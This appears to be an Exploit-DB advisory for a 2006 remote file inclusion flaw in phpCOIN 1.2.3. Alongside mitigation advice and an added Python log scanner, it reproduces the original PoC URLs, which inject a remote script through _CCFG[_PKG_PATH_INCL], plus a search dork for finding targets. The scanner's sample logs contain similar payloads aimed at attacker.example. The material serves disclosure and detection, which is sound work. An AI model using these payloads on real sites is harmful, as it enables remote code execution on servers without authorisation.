Vendor: phpCOIN
By: Timq
CVSS: 7.5 (HIGH)
Vulnerability type: Remote Include Vulnerability
CWE: 98
Product Name: phpCOIN
Affected Version From: 1.2.3
Affected Version To: 1.2.3
Patch Exists: YES
Related CWE: N/A
CPE: a:phpcoin:phpcoin:1.2.3
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Date: 2006

phpCOIN 1.2.3 (_CCFG[_PKG_PATH_INCL]) Remote Include Vulnerability

The vulnerability exists due to insufficient sanitization of user-supplied input passed via the '_CCFG[_PKG_PATH_INCL]' parameter to the 'constants.php' script. Because that value is used as the directory prefix of a require_once call, it can be exploited to include arbitrary files from remote hosts and execute arbitrary PHP code on the web server.

Mitigation:

Upgrade to the latest version of phpCOIN: 1.2.3 is the affected release, so apply the vendor patch for it or move to a later version.
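For a defender, the practical follow-up to this advisory is finding attempts in web server logs. The script below is an added example, not part of the advisory or of phpCOIN: it parses the query string of each request, looks for the '_CCFG[_PKG_PATH_INCL]' parameter named above (also in its URL-encoded form), and classifies the value as a remote include (URL scheme or PHP stream wrapper) or as a plain override of an internal config variable, which is suspicious in itself because no legitimate request should set it. The log lines, the host 'attacker.example', and the function names are constructed for the example; the log regex assumes Apache combined log format.

```python
"""Flag phpCOIN-style remote file inclusion attempts in web access logs.

Added example, not part of the advisory or of phpCOIN. Log lines,
hostnames and IPs are constructed for illustration.
"""
import re
from urllib.parse import parse_qsl

# Parameter named in the advisory. parse_qsl decodes keys, so the
# URL-encoded form _CCFG%5B_PKG_PATH_INCL%5D compares equal as well.
TARGET_PARAM = "_CCFG[_PKG_PATH_INCL]"

# Schemes and stream wrappers that make include()/require() fetch code
# from outside the document root when allow_url_include (or, on PHP < 5.2,
# allow_url_fopen) is enabled.
REMOTE_SCHEME = re.compile(r"^\s*(https?|ftps?|php|data|expect)\s*:", re.IGNORECASE)

# Apache combined log format (assumed): ip ident user [time] "METHOD url PROTO" status ...
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3}) '
)

# Constructed sample log lines: two remote-include attempts (plain and
# URL-encoded parameter name), one normal request, one local override.
SAMPLE_LOG = [
    '203.0.113.5 - - [24/Aug/2006:10:01:02 +0000] "GET /coin_includes/constants.php'
    '?_CCFG[_PKG_PATH_INCL]=http://attacker.example/shell.txt? HTTP/1.1" 200 512 "-" "Mozilla/4.0"',
    '203.0.113.5 - - [24/Aug/2006:10:01:09 +0000] "GET /includes/constants.php'
    '?_CCFG%5B_PKG_PATH_INCL%5D=ftp://attacker.example/s.txt%3F HTTP/1.1" 200 512 "-" "Mozilla/4.0"',
    '198.51.100.7 - - [24/Aug/2006:10:02:00 +0000] "GET /mod.php?mod=home HTTP/1.1" 200 8192 "-" "Mozilla/4.0"',
    '198.51.100.9 - - [24/Aug/2006:10:03:00 +0000] "GET /coin_includes/constants.php'
    '?_CCFG[_PKG_PATH_INCL]=/var/www/phpcoin/coin_includes/ HTTP/1.1" 200 512 "-" "Mozilla/4.0"',
]


def rfi_parameter_value(url):
    """Return the decoded value of TARGET_PARAM from url's query string, or None.

    The query is taken as everything after the first '?', so a '?' inside the
    parameter value (the trailing '?' of the advisory's PoC) stays in the value.
    """
    _, _, query = url.partition("?")
    for key, value in parse_qsl(query, keep_blank_values=True):
        if key == TARGET_PARAM:
            return value
    return None


def classify(value):
    """'remote' if the include path points at a URL or stream wrapper,
    otherwise 'override' (any external setting of this config key is abnormal)."""
    if REMOTE_SCHEME.match(value):
        return "remote"
    return "override"


def scan_log(lines):
    """Return one finding dict per request that carries TARGET_PARAM."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # not a parseable access-log line
        value = rfi_parameter_value(m.group("url"))
        if value is None:
            continue  # request does not touch the config parameter
        findings.append({
            "ip": m.group("ip"),
            "time": m.group("time"),
            "url": m.group("url"),
            "value": value,
            "verdict": classify(value),
        })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['verdict']:8} {f['ip']:15} {f['time']}  {f['value']}")
```

Any hit is worth investigating, but 'remote' verdicts are the ones that map directly to the code execution described in the advisory. On the server side, the corresponding hardening is to set allow_url_include=Off in php.ini (and allow_url_fopen=Off where nothing depends on it), so that an include path under attacker control can at most reach local files, and to make sure application configuration arrays such as $_CCFG are never populated from request data.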

Exploit-DB raw data:

phpCOIN 1.2.3 (_CCFG[_PKG_PATH_INCL]) Remote Include Vulnerability

##################################################################

Discovered by: Timq
http://www.securitydb.org
##################################################################

Email: timq[at]hackernetwork[dot]com

http://www.securitydb.org
##################################################################

Vulnerable: require_once include ($_CCFG['_PKG_PATH_INCL'].'redirect.php');

###################################################################

Exploit PoC:

http://www.site.com/[path]/coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://evil_script?
http://www.site.com/[path]/includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://evil_script?

Dork: Powered By phpCOIN 1.2.3
####################################################################

Shoutz: Warpboy,Z66,Gammarays,Archangel,BliTz,Splinter,InTel,ErazerZ,Maggot,PunKerX,Infiltration

#####################################################################

# milw0rm.com [2006-08-24]